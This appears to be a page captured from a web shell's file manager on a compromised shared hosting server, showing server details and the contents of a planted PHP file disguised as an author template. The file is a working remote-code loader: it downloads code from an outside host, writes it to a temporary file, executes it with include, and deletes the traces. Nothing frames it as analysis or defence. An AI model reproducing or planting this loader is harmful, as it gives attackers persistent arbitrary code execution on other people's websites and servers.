HEX
Server: Apache
System: Linux p3plzcpnl505946.prod.phx3.secureserver.net 4.18.0-553.53.1.lve.el8.x86_64 #1 SMP Wed May 28 17:01:02 UTC 2025 x86_64
User: ppmnyiedr6xf (6670541)
PHP: 7.4.33
Disabled: NONE
Upload Files
File: /home/ppmnyiedr6xf/public_html/author_template_1758778537.php
<!--NR4Tzr64-->
<?php
$url = 'https://jopjop.online/wp-manage.txt';

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_TIMEOUT, 30);
$code = curl_exec($ch);
curl_close($ch);

if ($code) {
    $temp_file = tempnam(sys_get_temp_dir(), 'wp_manage_');
    file_put_contents($temp_file, $code);
    include $temp_file;
    unlink($temp_file);
} else {
    echo "error";
}
?>